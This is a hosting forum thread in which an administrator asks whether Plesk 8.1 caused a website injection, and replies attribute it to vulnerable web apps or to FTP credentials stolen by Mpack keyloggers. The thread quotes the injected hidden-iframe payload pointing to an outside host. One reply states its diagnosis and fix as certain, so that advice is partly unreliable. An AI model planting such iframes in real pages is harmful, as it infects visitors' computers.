Security Hole in Plesk 8.1? My server domains got injected/exploitted.

[CBiLL]

I wasn't sure where to post this since it not "Question or Troubleshooting" so I am posting it here.

One of my domain and some of my customers domain got injected with this code in thier website.

<iframe src=http://googlerank.info/counter style=display:none></iframe>

At first I thought my CentOS 4 had a security hole in it so I did some research to find out where the hole migh be and found some folks who experience the same thing with the same code in thier websites and learn that they run differen Linux Distro but all run Plesk on thier server.

So that sort of narrow down to Plesk poissibly having a security holes allowing string being injected into website scripts or <title>

I have checked the server and coudln't find anything more or a trojan but I am not sure how far they got into my server becasue there not much out there about this injectioin string and all I know folks with this I have contacted all run Plesk.

Anyone know more about this exploit or string that could shed some more light on it?


Thank you
Bill

 

[atomicturtle]

Thats certainly an exploit, but its in those particular web sites applications, rather than plesk.

What applications are your users running?

 

[CBiLL]

I am running Phorum (http://www.phorum.org) and Coppermine Photo Gallery (http://coppermine-gallery.net/) and Cerberus HelpDesk (http://www.cerberusweb.com/)and FlashChat (http://www.tufat.com/s_flash_chat_chatroom.htm)

Mine was found injected into phorum script where <title> are pulled when visitor are surfing our phorum.

The 2 other I found were running Phorum and one other were not running any scripts but got injected into the <title> of thier main website and all of us is using Plesk.

The other I contacted which I found by doing some search and found them posting about this injection string on some forums so I PM'ed them asking if they use any web management and they PM back telling me they use Plesk is what they use but I did not ask what script they had on thier websites.

Also other I couldn't get a hold of on forums but they posted they are using 1and1 hosting for thier server and I know that 1and1 hosting is popular plesk users.


But my other sites on same server (different domain names) also have the Phorum and Coppermine Photo Gallery and FlashChat but no Cerberus HelpDesk and it did not get injected into those sites.

So I would have to narrow it down to either Plesk or Cerberus HelpDesk or the hacker wasn't aware of the other domains on the same server yet.



Bill

 

[CBiLL]

I would like to add the reason I posted this today because I couldn't add any new domain to Plesk on my server without it generating an error until I rebooted the server and it would let me add new domain after a reboot.

So I was thinking about this string I had discovered about a month back and thought I might post mentioning about it to see if that may be one of the issue as of why I couldn't add new domains to Plesk.


Here the post

http://forum.swsoft.com/showthread.php?s=&threadid=44611



Bill

 

[atomicturtle]

Yeah its not a plesk exploit in this case, the badguys are exploiting the applications. That it happens to running on a Plesk box doesnt really make a difference one way or the other.

I've been working on a procedure document on what to do when a system is compromised here:

http://www.atomicorp.com/wiki/index.php/Compromised_System

Ive done minimal work on the forensics piece. As I get the time Im filling this out more and more.

 

[CBiLL]

Originally posted by atomicturtle
Yeah its not a plesk exploit in this case, the badguys are exploiting the applications. That it happens to running on a Plesk box doesnt really make a difference one way or the other.

I've been working on a procedure document on what to do when a system is compromised here:

http://www.atomicorp.com/wiki/index.php/Compromised_System

Ive done minimal work on the forensics piece. As I get the time Im filling this out more and more.

Which application you suspect might be the cause of this exploit?

Do you think it gotten further and corrupted my Plesk?




Bill

 

[CBiLL]

I think that it is more than just a coincidence that during my research I found folks that suffer from this exploit is using Plesk instead of some different web management control panel, for example CPanel etc.

I would feel more comfortable if I could find someone with this exploit that is using one other web management than Plesk to eliminate Plesk as a possible cause since Plesk is our main application on the server that is widely used by all domain website customers.

Thank you
Bill

 

[atomicturtle]

There are known exploits in all the applications you mentioned. The control panel isn't a factor in this type of malicious activity. This would require a much longer description of what PSA acutally is, but the short version is that its just manipulating the configuration files of what is already there.

PSA itself is not serving up web pages. That is being done by the web server daemon that came with your distribution, along with php, mysql, etc. Whats happening is that you've got applications that your users have installed that are vulnerable to exploitation.

You can search for what types of vulnerabilities your web applications are vulnerable to here:
http://secunia.com/
http://www.securityfocus.com/

I couldn't say which one is being abused without a much deeper investigation to be honest. It could be all of them, if they're not running the latest stable releases.

The procedure Im documenting is the "worst case" scenario, assuming that the system has been compromised completely. As time goes on, I'll work more tasks into the forensics step to determine the extent of the damage (its a huge subject, it will likely take me years ).

 

[bandurao]

How does this hacking takes place:

This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. Those accounts files are affected whose FTP logins are leaked.

Beleive me, I am reasearching behind this iframe and java script hack from last 10 months.

ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH HACKER !!!!

How it's done
This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference.

After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000 dollars, the russian hacking bulletin boards are offering Mpack with 1 year support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!


This way this hack is spreading fastly from one computer to another broadcasting the passwords to hackers.During my research in this, I even found some of the password files collected by the hack on some of the hacked server, where they pass this password file to thier tool to add the code. In some cases Google bots picks this files and you can even find the login details of FTP accounts and Server root login details in google.

===============================================
Solution:
===============================================

For Server Administrators:

If you are having this problem server wide then the only possibility is your root password is used for this. Just change the password and this HACK WILL STOP

For individual person owning just a domain and not server:

If you are facing this problem and your administrator says its only your account, just change the FTP password and it will stop

You must have removed the code many times and it comes again, why ???
As you dont change the FTP password. So change that first.

Just changing password is not complete solution but is the first step.
Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer.

Just do the two things:

1) Change the FTP or root password of server
2) Clean format the PC

and take care in future, you dont visit any lof the virsu links made by this hack.
Also to keep your password secure I would suggest you to use any password manager software like:

http://keepass.info/

This is a FREE OpenSource Software

I can assure you this is confirmed solution and will definitely help you all.
Please try it and also when you are too confirmed, please spread this message in as many forums as you can so that others also come to know how to stop it.

Comments can be sent from:
http://shellscripters.com/contact.htm